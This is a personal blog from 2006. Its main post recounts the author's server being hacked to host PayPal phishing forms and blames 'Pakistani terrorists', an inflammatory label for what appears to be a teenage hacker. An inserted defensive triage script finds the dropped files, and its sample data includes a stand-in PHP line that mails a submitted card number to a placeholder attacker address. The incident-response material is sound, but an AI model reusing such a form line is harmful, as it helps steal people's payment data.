Happy New Year

31 12 2006
Happy New Year to everyone. Have a great Ought-Seven.

Update

01 08 2006
Photos are back, but this time I'm going with Flickr. It has a pretty doggone slick interface for managing and organizing your photo library as well as a nice API for extending or integrating their services into web applications. Pretty cool stuff. Only downside is that they do charge a ~$25.00/year fee for their "pro" service (2GB worth of photo transfers a month). Still pretty worth it, though for that price I'd like to be able to archive the original resolution pictures on their site. Currently I'm posting everything at 800x600 resolution for screen viewing.

If you have any photos you'd like added to Flickr, just let me know and I'll get them posted for you.

Back again.

05 06 2006

After an extended outage, I'm happy to report that Coomey.net is back in action. What happened was this: I got too zealous upgrading my webserver machine. I currently am enjoying the Ubuntu flavor of Linux on the server, and wanted to check out what was the latest and greatest BETA version of the software (duh, I couldn't see problems coming?).

Well, I did a dist-upgrade to the new version, everything downloaded and installed OK, but when I rebooted the server, it hung. As it turned out, there is a known bug in the version of the PPC kernel released with that package. So the box was hosed.

Silver lining now though, I am running on a real server with real bandwidth. The site shouldn't go down daily like before. :-)

Again, thanks Jeff!


Supporting Pakistani Terrorists

24 02 2006

If you've noticed that Coomey.net has been gone for the past few days, there is a pretty good reason for it. I'd been hacked. By Pakistani terrorists. Here's the scoop:

On Tuesday night, I got home from work and my cable Internet connection was shut off. I called Charter and they told me that they had received a complaint that my IP address had been serving phony PayPal phishing pages. After talking with Charter's incident response dude, they turned my connection back on. I did a quick scan of the webroot of my web server (YDL Linux 4.1) and didn't see any signs of mischief. I figured that at worst my DNS was temporarily hijacked and my domain name was pointing to some bad guy's machine.

Fast-forward to Wednesday night. This time I get home and my dynamic DNS provider (ZoneEdit) had suspended my service. Here we go again. Paypal had sent details of this PayPal phishing issue to ZoneEdit. I dug a little deeper into my webroot...

...and found a 'hidden' directory called .tikiwiki (note to self: always use a -a flag when doing an ls). Sure enough, someone had indeed hacked the box and placed all kinds of phony paypal forms on my machine. A scan of the Apache logs proved that some folks were indeed tricked and submitted their personal information via my website to an unknown scammer. Yikes, this is bad.

I quickly removed the offending files and did a comprehensive scan of the source code of the phony forms, which are all unsophisticated PHP scripts. Essentially they fake people into entering all their credit card info and then email the information to an email address. A hard-coded email address even: chinioti@gmail.com. I did a quick Google search on this email address, and it looks like this character is a Pakistani (probably about 15 years old in my opinion from his 'Net ramblings) who is part of a hacking group called Whackerz Pakistan (have as much fun with that name as you see fit :-)) that has been very busy defacing Western websites in the name of Islam after the whole Danish cartoon affair. It's scary that these folks did not deface my site. They most certainly wanted nobody to know they were there. Creepy.
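A triage script for the situation described in the two paragraphs above, added here as an example and not part of the original post: it builds a constructed webroot and Apache access log, lists dot-directories that a plain `ls` would hide, flags PHP files that call mail() (the trait of the phony forms), and counts the POST submissions to the hidden path so you know how many visitors were caught. Every path, IP address and mailbox in it is constructed.

```shell
#!/bin/sh
# Hidden (dot-prefixed) directories anywhere under the webroot; 'ls' without -a never shows them.
hidden_dirs() {
  find "$1" -type d -name '.*' | sort
}

# PHP files under the webroot that call mail(); phishing kits commonly email captured form data.
mailing_php() {
  find "$1" -name '*.php' -exec grep -l 'mail(' {} + | sort
}

# Number of POST requests to paths under a URL prefix: how many times the fake form was submitted.
post_count() {
  grep -c "\"POST $2" "$1" || true
}

# Distinct client IPs that submitted the form, for victim notification.
victim_ips() {
  grep "\"POST $2" "$1" | awk '{print $1}' | sort -u
}

# --- Constructed sample data (not from the real incident) ---
WORK=$(mktemp -d)
WEBROOT="$WORK/webroot"
LOG="$WORK/access.log"
mkdir -p "$WEBROOT/blog" "$WEBROOT/.tikiwiki/paypal"
printf '<?php echo "blog"; ?>\n' > "$WEBROOT/blog/index.php"
# Stand-in for a dropped phishing form; the mailbox is a placeholder, not a real address.
printf '<?php mail("attacker@example.invalid", "cc", $_POST["cc"]); ?>\n' > "$WEBROOT/.tikiwiki/paypal/login.php"
cat > "$LOG" <<'EOF'
203.0.113.5 - - [22/Feb/2006:20:01:10 -0500] "GET /.tikiwiki/paypal/login.php HTTP/1.1" 200 1843
203.0.113.5 - - [22/Feb/2006:20:01:45 -0500] "POST /.tikiwiki/paypal/login.php HTTP/1.1" 302 0
198.51.100.9 - - [22/Feb/2006:21:14:02 -0500] "GET /blog/index.php HTTP/1.1" 200 5120
198.51.100.9 - - [22/Feb/2006:21:15:30 -0500] "POST /.tikiwiki/paypal/login.php HTTP/1.1" 302 0
EOF

echo "Hidden directories:"; hidden_dirs "$WEBROOT"
echo "PHP files calling mail():"; mailing_php "$WEBROOT"
echo "Submissions to /.tikiwiki/: $(post_count "$LOG" /.tikiwiki/) from $(victim_ips "$LOG" /.tikiwiki/ | wc -l | tr -d ' ') distinct IPs"
```

Point the three variables at a real webroot and access log to run it against a live server instead of the sample data.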

Still, I have no idea how they got in. Looks like they didn't brute-force an SSH login, which I originally thought. Perhaps a security hole in the blog engine Serendipity? If anyone has any ideas on how they could have gotten in, I'd be extremely grateful.